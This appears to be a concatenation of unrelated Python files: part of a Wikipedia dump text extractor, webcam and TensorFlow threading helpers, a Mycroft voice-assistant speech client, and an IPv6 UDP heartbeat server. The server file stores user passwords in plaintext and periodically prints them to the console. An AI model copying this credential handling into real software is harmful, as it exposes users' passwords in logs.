from extract import Extractor, ignoreTag, define_template, acceptedNamespaces
# ===========================================================================
# Program version
__version__ = '3.0.5'
##
# Defined in <siteinfo>
# 'Template' is included by default; more are added when loading an external template file.
knownNamespaces = set(['Template'])
##
# The namespace used for template definitions
# It is the name associated with namespace key=10 in the siteinfo header.
templateNamespace = ''
templatePrefix = ''
##
# The namespace used for module definitions
# It is the name associated with namespace key=828 in the siteinfo header.
moduleNamespace = ''
# ----------------------------------------------------------------------
# Modules
# Only minimal support
# FIXME: import Lua modules.
modules = {
'convert': {
'convert': lambda x, u, *rest: x + ' ' + u, # no conversion
}
}
# ----------------------------------------------------------------------
# Expand using WikiMedia API
# import json
# def expandTemplates(text):
# """Expand templates invoking MediaWiki API"""
# text = urlib.urlencodew(text.encode('utf-8'))
# base = urlbase[:urlbase.rfind('/')]
# url = base + "/w/api.php?action=expandtemplates&format=json&text=" + text
# exp = json.loads(urllib.urlopen(url))
# return exp['expandtemplates']['*']
# ------------------------------------------------------------------------------
# Output
class NextFile():
"""
Synchronous generation of next available file name.
"""
filesPerDir = 100
def __init__(self, path_name):
self.path_name = path_name
self.dir_index = -1
self.file_index = -1
def next(self):
self.file_index = (self.file_index + 1) % NextFile.filesPerDir
if self.file_index == 0:
self.dir_index += 1
dirname = self._dirname()
if not os.path.isdir(dirname):
os.makedirs(dirname)
return self._filepath()
def _dirname(self):
char1 = self.dir_index % 26
char2 = int(self.dir_index / 26) % 26
return os.path.join(self.path_name, '%c%c' % (ord('A') + char2, ord('A') + char1))
def _filepath(self):
return '%s/wiki_%02d' % (self._dirname(), self.file_index)
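# Illustrative example of the naming scheme above: with dir_index == 27 the
# directory is 'BB' (27 % 26 -> second letter 'B', 27 // 26 -> first letter 'B'),
# and files inside are named wiki_00 .. wiki_99 before rolling over to the next directory.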
class OutputSplitter():
"""
File-like object that splits output to multiple files of a given max size.
"""
def __init__(self, nextFile, max_file_size=0, compress=True):
"""
:param nextFile: a NextFile object from which to obtain filenames
to use.
:param max_file_size: the maximum size of each file.
:param compress: whether to write data with bzip compression.
"""
self.nextFile = nextFile
self.compress = compress
self.max_file_size = max_file_size
self.file = self.open(self.nextFile.next())
def reserve(self, size):
if self.file.tell() + size > self.max_file_size:
self.close()
self.file = self.open(self.nextFile.next())
def write(self, data):
self.reserve(len(data))
if self.compress:
self.file.write(data.encode('utf-8'))
else:
self.file.write(data)
def close(self):
self.file.close()
def open(self, filename):
if self.compress:
return bz2.BZ2File(filename + '.bz2', 'w')
else:
return open(filename, 'w')
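# Minimal usage sketch (the path and sizes are illustrative):
#   files = NextFile('extracted')
#   out = OutputSplitter(files, max_file_size=1024 * 1024, compress=False)
#   out.write('<doc id="1" url="" title="Example">...</doc>\n')
#   out.close()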
# ----------------------------------------------------------------------
# READER
tagRE = re.compile(r'(.*?)<(/?\w+)[^>]*>(?:([^<]*)(<.*?>)?)?')
# 1 2 3 4
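# Illustrative match: for the line '  <title>Foo</title>' the groups are
#   group(2) == 'title', group(3) == 'Foo', group(4) == '</title>',
# and m.lastindex == 4 marks an open-close tag on a single line.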
def load_templates(file, output_file=None):
"""
Load templates from :param file:.
:param output_file: file where to save templates and modules.
"""
global templateNamespace, templatePrefix
templatePrefix = templateNamespace + ':'
global moduleNamespace, modulePrefix
modulePrefix = moduleNamespace + ':'
articles = 0
templates = 0
page = []
inText = False
if output_file:
output = open(output_file, 'w')
for line in file:
#line = line.decode('utf-8')
if '<' not in line: # faster than doing re.search()
if inText:
page.append(line)
continue
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'page':
page = []
elif tag == 'title':
title = m.group(3)
elif tag == 'text':
inText = True
line = line[m.start(3):m.end(3)]
page.append(line)
if m.lastindex == 4: # open-close
inText = False
elif tag == '/text':
if m.group(1):
page.append(m.group(1))
inText = False
elif inText:
page.append(line)
elif tag == '/page':
if not output_file and not templateNamespace: # do not know it yet
# we reconstruct it from the first title
colon = title.find(':')
if colon > 1:
templateNamespace = title[:colon]
templatePrefix = title[:colon + 1]
# FIXME: should reconstruct also moduleNamespace
if title.startswith(templatePrefix):
define_template(title, page)
templates += 1
# save templates and modules to file
if output_file and (title.startswith(templatePrefix) or
title.startswith(modulePrefix)):
output.write('<page>\n')
output.write(' <title>%s</title>\n' % title)
output.write(' <ns>10</ns>\n')
output.write(' <text>')
for line in page:
output.write(line)
output.write(' </text>\n')
output.write('</page>\n')
page = []
articles += 1
if articles % 100000 == 0:
logging.info("Preprocessed %d pages", articles)
if output_file:
output.close()
logging.info("Saved %d templates to '%s'", templates, output_file)
return templates
def decode_open(filename, mode='rt', encoding='utf-8'):
"""
Open a file, decoding and decompressing as needed depending on extension ('.gz' or '.bz2').
:param filename: the file to open.
"""
ext = os.path.splitext(filename)[1]
if ext == '.gz':
import gzip
return gzip.open(filename, mode, encoding=encoding)
elif ext == '.bz2':
return bz2.open(filename, mode=mode, encoding=encoding)
else:
return open(filename, mode, encoding=encoding)
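# Illustrative examples: decode_open('dump.xml.bz2') yields a text-mode bz2
# stream decoded as UTF-8, while decode_open('pages.xml') falls back to a plain
# open(); both can be iterated line by line like a regular file object.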
def process_dump(input_file, template_file, out_file, file_size, file_compress,
process_count, html_safe):
"""
:param input_file: name of the wikipedia dump file; '-' to read from stdin
:param template_file: optional file with template definitions.
:param out_file: directory where to store extracted data, or '-' for stdout
:param file_size: max size of each extracted file, or None for no max (one file)
:param file_compress: whether to compress files with bzip.
:param process_count: number of extraction processes to spawn.
"""
global knownNamespaces
global templateNamespace, templatePrefix
global moduleNamespace, modulePrefix
urlbase = '' # This is obtained from <siteinfo>
input = decode_open(input_file)
# collect siteinfo
for line in input:
line = line #.decode('utf-8')
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'base':
# discover urlbase from the xml dump file
# /mediawiki/siteinfo/base
base = m.group(3)
urlbase = base[:base.rfind("/")]
elif tag == 'namespace':
knownNamespaces.add(m.group(3))
if re.search('key="10"', line):
templateNamespace = m.group(3)
templatePrefix = templateNamespace + ':'
elif re.search('key="828"', line):
moduleNamespace = m.group(3)
modulePrefix = moduleNamespace + ':'
elif tag == '/siteinfo':
break
if expand_templates:
# preprocess
template_load_start = default_timer()
if template_file and os.path.exists(template_file):
logging.info("Preprocessing '%s' to collect template definitions: this may take some time.", template_file)
file = decode_open(template_file)
templates = load_templates(file)
file.close()
else:
if input_file == '-':
# can't scan then reset stdin; must error w/ suggestion to specify template_file
raise ValueError("to use templates with stdin dump, must supply explicit template-file")
logging.info("Preprocessing '%s' to collect template definitions: this may take some time.", input_file)
templates = load_templates(input, template_file)
input.close()
input = decode_open(input_file)
template_load_elapsed = default_timer() - template_load_start
logging.info("Loaded %d templates in %.1fs", templates, template_load_elapsed)
if out_file == '-':
output = sys.stdout
if file_compress:
logging.warn("writing to stdout, so no output compression (use an external tool)")
else:
nextFile = NextFile(out_file)
output = OutputSplitter(nextFile, file_size, file_compress)
# process pages
logging.info("Starting page extraction from %s.", input_file)
extract_start = default_timer()
# Parallel Map/Reduce:
# - pages to be processed are dispatched to workers
# - a reduce process collects the results, sort them and print them.
maxsize = 10 * process_count
# output queue
output_queue = Queue(maxsize=maxsize)
# Reduce job that sorts and prints output
reduce = Process(target=reduce_process, args=(output_queue, output))
reduce.start()
# initialize jobs queue
jobs_queue = Queue(maxsize=maxsize)
# start worker processes
logging.info("Using %d extract processes.", process_count)
workers = []
for _ in range(max(1, process_count)):
extractor = Process(target=extract_process,
args=(jobs_queue, output_queue, html_safe))
extractor.daemon = True # only live while parent process lives
extractor.start()
workers.append(extractor)
# Mapper process
# we collect individual lines, since str.join() is significantly faster
# than concatenation
page = []
id = ''
revid = ''
last_id = ''
ordinal = 0 # page count
inText = False
redirect = False
for line in input:
if '<' not in line: # faster than doing re.search()
if inText:
page.append(line)
continue
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'page':
page = []
redirect = False
elif tag == 'id' and not id:
id = m.group(3)
elif tag == 'id' and id: # <revision> <id></id> </revision>
revid = m.group(3)
elif tag == 'title':
title = m.group(3)
elif tag == 'redirect':
redirect = True
elif tag == 'text':
inText = True
line = line[m.start(3):m.end(3)]
page.append(line)
if m.lastindex == 4: # open-close
inText = False
elif tag == '/text':
if m.group(1):
page.append(m.group(1))
inText = False
elif inText:
page.append(line)
elif tag == '/page':
colon = title.find(':')
if (colon < 0 or (title[:colon] in acceptedNamespaces) and id != last_id and
not redirect and not title.startswith(templateNamespace)):
job = (id, revid, urlbase, title, page, ordinal)
jobs_queue.put(job) # goes to any available extract_process
last_id = id
ordinal += 1
id = ''
revid = ''
page = []
input.close()
# signal termination
for _ in workers:
jobs_queue.put(None)
# wait for workers to terminate
for w in workers:
w.join()
# signal end of work to reduce process
output_queue.put(None)
# wait for it to finish
reduce.join()
if output != sys.stdout:
output.close()
extract_duration = default_timer() - extract_start
extract_rate = ordinal / extract_duration
logging.info("Finished %d-process extraction of %d articles in %.1fs (%.1f art/s)",
process_count, ordinal, extract_duration, extract_rate)
# ----------------------------------------------------------------------
# Multiprocess support
def extract_process(jobs_queue, output_queue, html_safe):
"""Pull tuples of raw page content, do CPU/regex-heavy fixup, push finished text
:param jobs_queue: where to get jobs.
:param output_queue: where to queue extracted text for output.
:param html_safe: whether to convert entities in text to HTML.
"""
while True:
job = jobs_queue.get() # job is (id, revid, urlbase, title, page, ordinal)
if job:
out = StringIO() # memory buffer
Extractor(*job[:-1]).extract(out, html_safe) # (id, revid, urlbase, title, page)
text = out.getvalue()
output_queue.put((job[-1], text)) # (ordinal, extracted_text)
out.close()
else:
break
def reduce_process(output_queue, output):
"""Pull finished article text, write series of files (or stdout)
:param output_queue: text to be output.
:param output: file object where to print.
"""
interval_start = default_timer()
period = 100000
# FIXME: use a heap
ordering_buffer = {} # collected pages
next_ordinal = 0 # sequence number of pages
while True:
if next_ordinal in ordering_buffer:
output.write(ordering_buffer.pop(next_ordinal))
next_ordinal += 1
# progress report
if next_ordinal % period == 0:
interval_rate = period / (default_timer() - interval_start)
logging.info("Extracted %d articles (%.1f art/s)",
next_ordinal, interval_rate)
interval_start = default_timer()
else:
# mapper puts None to signal finish
pair = output_queue.get()
if not pair:
break
ordinal, text = pair
ordering_buffer[ordinal] = text
# ----------------------------------------------------------------------
# Minimum size of output files
minFileSize = 200 * 1024
def main():
print("wikiiextractor main running")
global urlbase, acceptedNamespaces
global expand_templates, templateCache
parser = argparse.ArgumentParser(prog=os.path.basename(sys.argv[0]),
formatter_class=argparse.RawDescriptionHelpFormatter,
description=__doc__)
parser.add_argument("input",
help="XML wiki dump file")
groupO = parser.add_argument_group('Output')
groupO.add_argument("-o", "--output", default="text",
help="directory for extracted files (or '-' for dumping to stdout)")
groupO.add_argument("-b", "--bytes", default="1M",
help="maximum bytes per output file (default %(default)s)",
metavar="n[KMG]")
groupO.add_argument("-c", "--compress", action="store_true",
help="compress output files using bzip")
groupO.add_argument("--json", action="store_true",
help="write output in json format instead of the default <doc> format")
groupP = parser.add_argument_group('Processing')
groupP.add_argument("--html", action="store_true",
help="produce HTML output, subsumes --links")
groupP.add_argument("-l", "--links", action="store_true",
help="preserve links")
groupP.add_argument("-ns", "--namespaces", default="", metavar="ns1,ns2",
help="accepted namespaces")
groupP.add_argument("--templates",
help="use or create file containing templates")
groupP.add_argument("--no-templates", action="store_false",
help="Do not expand templates")
groupP.add_argument("--html-safe", default=True,
help="use to produce HTML safe output within <doc>...</doc>")
default_process_count = cpu_count() - 1
parser.add_argument("--processes", type=int, default=default_process_count,
help="Number of processes to use (default %(default)s)")
groupS = parser.add_argument_group('Special')
groupS.add_argument("-q", "--quiet", action="store_true",
help="suppress reporting progress info")
groupS.add_argument("--debug", action="store_true",
help="print debug info")
groupS.add_argument("-a", "--article", action="store_true",
help="analyze a file containing a single article (debug option)")
groupS.add_argument("-v", "--version", action="version",
version='%(prog)s ' + __version__,
help="print program version")
args = parser.parse_args()
Extractor.keepLinks = args.links
Extractor.HtmlFormatting = args.html
if args.html:
Extractor.keepLinks = True
Extractor.to_json = args.json
expand_templates = args.no_templates
try:
power = 'kmg'.find(args.bytes[-1].lower()) + 1
file_size = int(args.bytes[:-1]) * 1024 ** power
if file_size < minFileSize:
raise ValueError()
except ValueError:
logging.error('Insufficient or invalid size: %s', args.bytes)
return
if args.namespaces:
acceptedNamespaces = set(args.namespaces.split(','))
FORMAT = '%(levelname)s: %(message)s'
logging.basicConfig(format=FORMAT)
logger = logging.getLogger()
if not args.quiet:
logger.setLevel(logging.INFO)
if args.debug:
logger.setLevel(logging.DEBUG)
input_file = args.input
if not Extractor.keepLinks:
ignoreTag('a')
# sharing cache of parser templates is too slow:
# manager = Manager()
# templateCache = manager.dict()
if args.article:
if args.templates:
if os.path.exists(args.templates):
with open(args.templates) as file:
load_templates(file)
with open(input_file) as file:
page = file.read()
print(input_file, "open")
ids = re.findall(r'<id>(\d*?)</id>', page)
id = ids[0] if ids else ''
revid = ids[1] if len(ids) > 1 else ''
m = re.search(r'<title>(.*?)</title>', page)
if m:
title = m.group(1)
else:
logging.error('Missing title element')
return
m = re.search(r'<base>(.*?)</base>', page)
if m:
base = m.group(1)
urlbase = base[:base.rfind("/")]
else:
urlbase = ''
Extractor(id, revid, urlbase, title, [page]).extract(sys.stdout)
return
output_path = args.output
if output_path != '-' and not os.path.isdir(output_path):
try:
os.makedirs(output_path)
except:
logging.error('Could not create: %s', output_path)
return
process_dump(input_file, args.templates, output_path, file_size,
args.compress, args.processes, args.html_safe)
if __name__ == '__main__':
main()
|
helper.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 22 11:53:52 2017
@author: GustavZ
"""
import datetime
import cv2
import threading
import time
import tensorflow as tf
import sys
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY2:
import Queue
elif PY3:
import queue as Queue
class FPS:
# from https://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self._numFrames = 0
def start(self):
# start the timer
self._start = datetime.datetime.now()
return self
def stop(self):
# stop the timer
self._end = datetime.datetime.now()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self._numFrames += 1
def elapsed(self):
# return the total number of seconds between the start and
# end interval
return (self._end - self._start).total_seconds()
def fps(self):
# compute the (approximate) frames per second
return self._numFrames / self.elapsed()
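# Minimal usage sketch for the FPS timer above (the frame count is illustrative):
#   fps = FPS().start()
#   for _ in range(100):
#       fps.update()
#   fps.stop()
#   print(fps.fps())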
class FPS2:
def __init__(self, interval):
self._glob_start = None
self._glob_end = None
self._glob_numFrames = 0
self._local_start = None
self._local_numFrames = 0
self._interval = interval
self.curr_local_elapsed = None
self.first = False
def start(self):
self._glob_start = datetime.datetime.now()
self._local_start = self._glob_start
return self
def stop(self):
self._glob_end = datetime.datetime.now()
def update(self):
self.first = True
curr_time = datetime.datetime.now()
self.curr_local_elapsed = (curr_time - self._local_start).total_seconds()
self._glob_numFrames += 1
self._local_numFrames += 1
if self.curr_local_elapsed > self._interval:
print("> FPS: {}".format(self.fps_local()))
self._local_numFrames = 0
self._local_start = curr_time
def elapsed(self):
return (self._glob_end - self._glob_start).total_seconds()
def fps(self):
return self._glob_numFrames / self.elapsed()
def fps_local(self):
if self.first:
return round(self._local_numFrames / self.curr_local_elapsed,1)
else:
return 0.0
class WebcamVideoStream:
# with modifications from https://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.frame_counter = 1
self.width = width
self.height = height
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, self.width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
#Debug stream shape
self.real_width = int(self.stream.get(3))
self.real_height = int(self.stream.get(4))
print("> Start video stream with shape: {},{}".format(self.real_width,self.real_height))
def start(self):
# start the thread to read frames from the video stream
threading.Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
self.stream.release()
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
self.frame_counter += 1
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def isActive(self):
# check if VideoCapture is still Opened
return self.stream.isOpened()
def resize(self):
try:
self.frame = cv2.resize(self.frame, (self.width, self.height))
except:
print("> Error resizing video stream")
class SessionWorker():
# from https://github.com/naisy/realtime_object_detection/blob/master/lib/session_worker.py
# TensorFlow Session Thread
#
# usage:
# before:
# results = sess.run([opt1,opt2],feed_dict={input_x:x,input_y:y})
# after:
# opts = [opt1,opt2]
# feeds = {input_x:x,input_y:y}
# worker = SessionWorker("TAG",graph,config)
# worker.put_sess_queue(opts,feeds)
# q = worker.get_result_queue()
# if q is None:
# continue
# results = q['results']
# extras = q['extras']
#
# extras: None, or frame image data to draw on. The GPU detection thread doesn't wait for the result, so keep the frame image data if you want to draw detection result boxes on the image.
#
def __init__(self,tag,graph,config):
self.lock = threading.Lock()
self.sess_queue = Queue.Queue()
self.result_queue = Queue.Queue()
self.tag = tag
t = threading.Thread(target=self.execution,args=(graph,config))
t.setDaemon(True)
t.start()
return
def execution(self,graph,config):
self.is_thread_running = True
try:
with tf.Session(graph=graph,config=config) as sess:
while self.is_thread_running:
while not self.sess_queue.empty():
q = self.sess_queue.get(block=False)
opts = q["opts"]
feeds= q["feeds"]
extras= q["extras"]
if feeds is None:
results = sess.run(opts)
else:
results = sess.run(opts,feed_dict=feeds)
self.result_queue.put({"results":results,"extras":extras})
self.sess_queue.task_done()
time.sleep(0.005)
except:
import traceback
traceback.print_exc()
self.stop()
return
def is_sess_empty(self):
if self.sess_queue.empty():
return True
else:
return False
def put_sess_queue(self,opts,feeds=None,extras=None):
self.sess_queue.put({"opts":opts,"feeds":feeds,"extras":extras})
return
def is_result_empty(self):
if self.result_queue.empty():
return True
else:
return False
def get_result_queue(self):
result = None
if not self.result_queue.empty():
result = self.result_queue.get(block=False)
self.result_queue.task_done()
return result
def stop(self):
self.is_thread_running=False
with self.lock:
while not self.sess_queue.empty():
q = self.sess_queue.get(block=False)
self.sess_queue.task_done()
return
|
main.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from threading import Thread, Lock
from mycroft.client.enclosure.api import EnclosureAPI
from mycroft.client.speech.listener import RecognizerLoop
from mycroft.configuration import ConfigurationManager
from mycroft.identity import IdentityManager
from mycroft.lock import Lock as PIDLock # Create/Support PID locking file
from mycroft.messagebus.client.ws import WebsocketClient
from mycroft.messagebus.message import Message
from mycroft.util.log import LOG
ws = None
lock = Lock()
loop = None
config = ConfigurationManager.get()
def handle_record_begin():
LOG.info("Begin Recording...")
ws.emit(Message('recognizer_loop:record_begin'))
def handle_record_end():
LOG.info("End Recording...")
ws.emit(Message('recognizer_loop:record_end'))
def handle_no_internet():
LOG.debug("Notifying enclosure of no internet connection")
ws.emit(Message('enclosure.notify.no_internet'))
def handle_wakeword(event):
LOG.info("Wakeword Detected: " + event['utterance'])
ws.emit(Message('recognizer_loop:wakeword', event))
def handle_hotword(event):
LOG.info("Hotword Detected: " + event['hotword'])
ws.emit(Message('recognizer_loop:hotword', event))
def handle_utterance(event):
LOG.info("Utterance: " + str(event['utterances']))
ws.emit(Message('recognizer_loop:utterance', event))
def handle_speak(event):
"""
Forward speak message to message bus.
"""
ws.emit(Message('speak', event))
def handle_complete_intent_failure(event):
LOG.info("Failed to find intent.")
# TODO: Localize
data = {'utterance':
"Sorry, I didn't catch that. Please rephrase your request."}
ws.emit(Message('speak', data))
def handle_sleep(event):
loop.sleep()
def handle_wake_up(event):
loop.awaken()
def handle_mic_mute(event):
loop.mute()
def handle_mic_unmute(event):
loop.unmute()
def handle_paired(event):
IdentityManager.update(event.data)
def handle_audio_start(event):
"""
Mute recognizer loop
"""
loop.mute()
def handle_audio_end(event):
"""
Request unmute. If more sources have requested the mic to be muted,
it will remain muted.
"""
loop.unmute() # restore
def handle_stop(event):
"""
Handler for mycroft.stop, i.e. button press
"""
loop.force_unmute()
def handle_open():
# TODO: Move this into the Enclosure (not speech client)
# Reset the UI to indicate ready for speech processing
EnclosureAPI(ws).reset()
def connect():
ws.run_forever()
def main():
global ws
global loop
global config
lock = PIDLock("voice")
ws = WebsocketClient()
config = ConfigurationManager.get()
ConfigurationManager.init(ws)
loop = RecognizerLoop()
loop.on('recognizer_loop:utterance', handle_utterance)
loop.on('speak', handle_speak)
loop.on('recognizer_loop:record_begin', handle_record_begin)
loop.on('recognizer_loop:wakeword', handle_wakeword)
loop.on('recognizer_loop:hotword', handle_hotword)
loop.on('recognizer_loop:speak', handle_speak)
loop.on('recognizer_loop:record_end', handle_record_end)
loop.on('recognizer_loop:no_internet', handle_no_internet)
ws.on('open', handle_open)
ws.on('complete_intent_failure', handle_complete_intent_failure)
ws.on('recognizer_loop:sleep', handle_sleep)
ws.on('recognizer_loop:wake_up', handle_wake_up)
ws.on('mycroft.mic.mute', handle_mic_mute)
ws.on('mycroft.mic.unmute', handle_mic_unmute)
ws.on("mycroft.paired", handle_paired)
ws.on('recognizer_loop:audio_output_start', handle_audio_start)
ws.on('recognizer_loop:audio_output_end', handle_audio_end)
ws.on('mycroft.stop', handle_stop)
event_thread = Thread(target=connect)
event_thread.setDaemon(True)
event_thread.start()
try:
loop.run()
except KeyboardInterrupt as e:
LOG.exception(e)
sys.exit()
if __name__ == "__main__":
main()
|
transfer.py
|
from Ipv6_stun.server import Service
import socket
from threading import Thread
import json
import time
from datetime import datetime
class Transfer:
def __init__(self,address=('127.0.0.1',9080)):
self.user_info ={}
#self.user_info={'000000':{'passward':'sdlab123','service':None,'heart_addr':None}}
self.serve=True
self.address=address
self.sock_addr=(address[0],9090)
pass
### Start the heartbeat port ###
def start_heart(self,id):
sock=socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
data = json.dumps(id).encode('utf-8')
while self.serve:
sock.sendto(data,self.sock_addr)
if 'heart_addr' in self.user_info[id]:
sock.close()
break
pass
self.user_info[id]['service']=Service(self.user_info[id]['heart_addr'])
self.user_info[id]['service'].run()
print('id:' + str(id) + ' service start success .....')
pass
### Registration socket, used to determine the address assigned to the heartbeat port ###
def addr_sock(self):
addr_sock=socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
addr_sock.bind(self.sock_addr)
while self.serve:
data, address = addr_sock.recvfrom(1024)
id=json.loads(data.decode('utf-8'))
if id in self.user_info:
self.user_info[id]['heart_addr']=address
pass
pass
pass
### Maintain user login info and delete the ids of offline users ###
def maintain(self):
while self.serve:
A = 1
B = 1
for id in list(self.user_info.keys()):
try:
A = len(self.user_info[id]['service'].A)
B = len(self.user_info[id]['service'].B)
except:
pass
if A == 0 and B == 0:
t1=self.user_info[id]['service'].start_time
if time.time()-t1 >18:
try:
del self.user_info[id]
print('id:' + str(id) + ' service close success .....')
except:
pass
pass
pass
############
time.sleep(2)
pass
pass
def print_info(self):
while self.serve:
now_time = datetime.now()
str_time = now_time.strftime("%Y-%m-%d %X")
print('time: '+str_time)
print('user info: ' + str(self.user_info))
time.sleep(20)
pass
pass
def sign_service(self):
sign_sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
sign_sock.bind(self.address)
while self.serve:
try:
data,address=sign_sock.recvfrom(1024)
except:
continue
info=json.loads(data.decode('utf-8'))
id=info['id']
passward=info['passward']
group=info['group']
if id not in self.user_info:
self.user_info[id]={}
self.user_info[id]['passward']=passward
self.start_heart(id)
continue
### If the password does not match ###
if passward != self.user_info[id]['passward']:
data = 'password error, change id or input the correct password....'
data = json.dumps(data).encode('utf-8')
sign_sock.sendto(data, address)
continue
heart_addr = self.user_info[id]['heart_addr']
heart_addr = json.dumps(heart_addr).encode('utf-8')
sign_sock.sendto(heart_addr, address)
pass
def run(self):
t1 = Thread(target=self.addr_sock)
print('addr_sock start success .....')
time.sleep(0.2)
t2 = Thread(target=self.sign_service)
t3 = Thread(target=self.maintain)
print('sign_service start success .....')
t4 = Thread(target=self.print_info)
t1.start()
t2.start()
t3.start()
t4.start()
pass
def __del__(self):
pass
pass
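# Minimal usage sketch (the IPv6 loopback address is illustrative; the default
# '127.0.0.1' would need an IPv6 replacement since the sockets use AF_INET6):
#   transfer = Transfer(('::1', 9080))
#   transfer.run()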
|